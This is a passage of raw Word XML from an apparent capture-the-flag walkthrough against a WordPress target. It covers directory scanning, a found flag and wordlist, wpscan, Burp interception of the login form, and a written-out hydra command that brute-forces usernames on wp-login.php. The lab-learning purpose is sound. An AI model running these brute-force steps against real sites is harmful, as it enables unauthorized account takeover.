      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> searching for hidden directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B709784" w14:textId="6C0C52CB" w:rsidR="00134FC3" w:rsidRDefault="00CA171B" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62170D3A" wp14:editId="78BC54C0">
            <wp:extent cx="5943600" cy="48202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943600" cy="4820285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD11821" w14:textId="63C38F0D" w:rsidR="00CA171B" w:rsidRDefault="00CA171B" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6053DA89" wp14:editId="6C794268">
            <wp:extent cx="5943600" cy="1298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5943600" cy="1298575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CB274A" w14:textId="4731B6B6" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DirBuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> application w</w:t>
      </w:r>
      <w:r w:rsidR="003D34B6">
        <w:t>ith</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> report generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AF1547" w14:textId="2477CF80" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, wordlist, don't be recursive (unneeded in this), File extension "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2395C851" w14:textId="1F4023B7" w:rsidR="003D34B6" w:rsidRDefault="00CA171B" w:rsidP="003D34B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AA6D4C8" wp14:editId="1A19BD04">
            <wp:extent cx="5943600" cy="4206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5943600" cy="4206240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="048921E8" w14:textId="3DCAE531" w:rsidR="00297864" w:rsidRDefault="00297864" w:rsidP="003D34B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35D6E8CA" wp14:editId="40B1A498">
            <wp:extent cx="4207933" cy="2990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4248217" cy="3018685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC76364" w14:textId="0450368D" w:rsidR="00297864" w:rsidRDefault="00297864" w:rsidP="003D34B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14496AD5" wp14:editId="2E6F7C76">
            <wp:extent cx="3918822" cy="5139267"/>
            <wp:effectExtent l="0" t="0" r="571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3931914" cy="5156436"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B05CF28" w14:textId="1B8379EF" w:rsidR="00297864" w:rsidRDefault="00297864" w:rsidP="003D34B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6970C608" wp14:editId="2CF4F509">
            <wp:extent cx="2057400" cy="41668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2086858" cy="4226548"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE97F4C" w14:textId="2826BA96" w:rsidR="00297864" w:rsidRDefault="00297864" w:rsidP="003D34B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70D0D253" wp14:editId="5B384A52">
            <wp:extent cx="5943600" cy="26839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7901" cy="2690391"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85BCDC" w14:textId="77777777" w:rsidR="00297864" w:rsidRDefault="00297864" w:rsidP="003D34B6"/>
    <w:p w14:paraId="74D024FF" w14:textId="7A042ED6" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="003D34B6">
      <w:r>
        <w:t xml:space="preserve">Physically explored the website, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> input, triggered 404, accessed wp-login, robots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA1C19" w14:textId="148FA143" w:rsidR="00E45B2A" w:rsidRDefault="00E45B2A" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0955A4F7" wp14:editId="58FA4756">
            <wp:extent cx="5943600" cy="31756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3175635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="652A33D8" w14:textId="4B5BADB4" w:rsidR="00E45B2A" w:rsidRDefault="00E45B2A" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="617D86D3" wp14:editId="40C7C84B">
            <wp:extent cx="5943600" cy="3190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p>
    <w:p w14:paraId="17239EAC" w14:textId="063A77FE" w:rsidR="00E45B2A" w:rsidRDefault="00E45B2A" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C19FC0E" wp14:editId="04C3066E">
            <wp:extent cx="6113780" cy="3564467"/>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171243" cy="3597969"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70285387" w14:textId="1F498E05" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>FIRST FLAG FOUND, [target-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/robots] &gt; [target0ipaddress/flag-1-of-3.txt] and [target-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fsocity.dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56195CD9" w14:textId="7E58EB2C" w:rsidR="00D41059" w:rsidRDefault="00E45B2A" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3442F35E" wp14:editId="68698510">
            <wp:extent cx="5943600" cy="31972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14:paraId="260BE5F2" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>download [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fsocity.dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31814B15" w14:textId="5601EF85" w:rsidR="00D41059" w:rsidRDefault="00E45B2A" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="234E9D7B" wp14:editId="1A6826DF">
            <wp:extent cx="5943600" cy="31616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943600" cy="3161665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A3A1F" w14:textId="03D2C5B2" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>cat [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fsocity.dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00FF0927">
        <w:t xml:space="preserve"> | head</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17049AC5" w14:textId="47F6F99B" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>to see what the first few lines of text were</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D29522" w14:textId="0CA1D394" w:rsidR="00FF0927" w:rsidRDefault="00FF0927" w:rsidP="00FF0927">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="373E8073" wp14:editId="1D8FE3E8">
            <wp:extent cx="3048000" cy="133024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3101687" cy="1353675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B23370" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fsocity.dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6C0830" w14:textId="1F05AAE7" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>word count, it's huge [that's what she said]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF7838" w14:textId="5688244B" w:rsidR="00FF0927" w:rsidRDefault="00FF0927" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FE524B7" wp14:editId="1EDD462A">
            <wp:extent cx="3818467" cy="450383"/>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3966315" cy="467822"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5482CB44" w14:textId="06670C30" w:rsidR="00D41059" w:rsidRDefault="00FF0927" w:rsidP="00D41059">
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00D41059">
        <w:t>at [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D41059">
        <w:t>fsocity.dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D41059">
        <w:t>] | sort -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D41059">
        <w:t>U  &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D41059">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D41059">
        <w:t>sorted_fsocity.dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D41059">
        <w:t xml:space="preserve">]  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BCC187" w14:textId="4926B3A5" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sorts all unique into a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>seperate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AE0BA1" w14:textId="73AD06B0" w:rsidR="00FF0927" w:rsidRDefault="00FF0927" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FE673FD" wp14:editId="39E99F52">
            <wp:extent cx="5943600" cy="2978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5943600" cy="297815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C591902" w14:textId="3F73B9DC" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sorted_fsocity.dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412127B6" w14:textId="276064D9" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>word count, significantly lower</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFD3D9F" w14:textId="408074B9" w:rsidR="00D41059" w:rsidRDefault="00FF0927" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B0AB9AC" wp14:editId="0A3B2CF4">
            <wp:extent cx="3860800" cy="4100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extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4088908" cy="434228"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59763FC2" w14:textId="77777777" w:rsidR="00FF0927" w:rsidRDefault="00FF0927" w:rsidP="00D41059"/>
    <w:p w14:paraId="3DD8A68C" w14:textId="77777777" w:rsidR="00FF0927" w:rsidRDefault="00FF0927" w:rsidP="00D41059"/>
    <w:p w14:paraId="55D7529D" w14:textId="77777777" w:rsidR="00FF0927" w:rsidRDefault="00FF0927" w:rsidP="00D41059"/>
    <w:p w14:paraId="6C4C81DE" w14:textId="77777777" w:rsidR="00FF0927" w:rsidRDefault="00FF0927" w:rsidP="00D41059"/>
    <w:p w14:paraId="1A0F4935" w14:textId="77777777" w:rsidR="00FF0927" w:rsidRDefault="00FF0927" w:rsidP="00D41059"/>
    <w:p w14:paraId="2131C1B3" w14:textId="643AEFC1" w:rsidR="00D41059" w:rsidRDefault="00D62588" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00D41059">
        <w:t>pscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D41059">
        <w:t xml:space="preserve"> [target-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D41059">
        <w:t>ipaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D41059">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE0A7B4" w14:textId="27A8063A" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">find information </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>partaining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to word press</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218E564C" w14:textId="61CF30DB" w:rsidR="00D41059" w:rsidRDefault="00D62588" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A1C4F57" wp14:editId="3707DD24">
            <wp:extent cx="4690533" cy="4337740"/>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extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4708436" cy="4354296"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64922C08" w14:textId="4BAF3BA7" w:rsidR="00D62588" w:rsidRDefault="00D62588" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BAF019C" wp14:editId="051E2F7C">
            <wp:extent cx="5619935" cy="34290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5679879" cy="3465575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C904C36" w14:textId="35B9C0C2" w:rsidR="00D62588" w:rsidRDefault="00D62588" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32249038" wp14:editId="4E60FB29">
            <wp:extent cx="5965664" cy="1430867"/>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extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6015448" cy="1442808"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C915409" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E51C07A" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>used integrated browser proxy, intercepted the login action on the wp-login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4151CEAE" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">shows that it's a post form(top), log=username and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=password(bottom)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A72B230" w14:textId="14B48F91" w:rsidR="00D41059" w:rsidRDefault="002C2B23" w:rsidP="002C2B23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DF47395" wp14:editId="2A53C93F">
            <wp:extent cx="6077199" cy="3158066"/>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1252" cy="3180959"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D65FB85" w14:textId="77777777" w:rsidR="002C2B23" w:rsidRDefault="002C2B23" w:rsidP="00D41059"/>
    <w:p w14:paraId="1D2AD87F" w14:textId="6B5C423D" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">Brute force for username and password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC039C3" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059"/>
    <w:p w14:paraId="5C74951A" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>hydra -L [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sorted_fsocity.dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">] -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unkown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [target-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] http-post-form '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wp-login.php:log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=^USER^&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=^PASS^&amp;wp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sumbit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Log+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>In:F</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=Invalid Username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F88E72D" w14:textId="728CBE04" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-L list file upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4219964B" w14:textId="581DFDCF" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unkown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sets the password as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uknown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA79947" w14:textId="02200088" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>http-post-form, because it shown on burp as a post form</w:t>
      </w:r>
    </w:p>
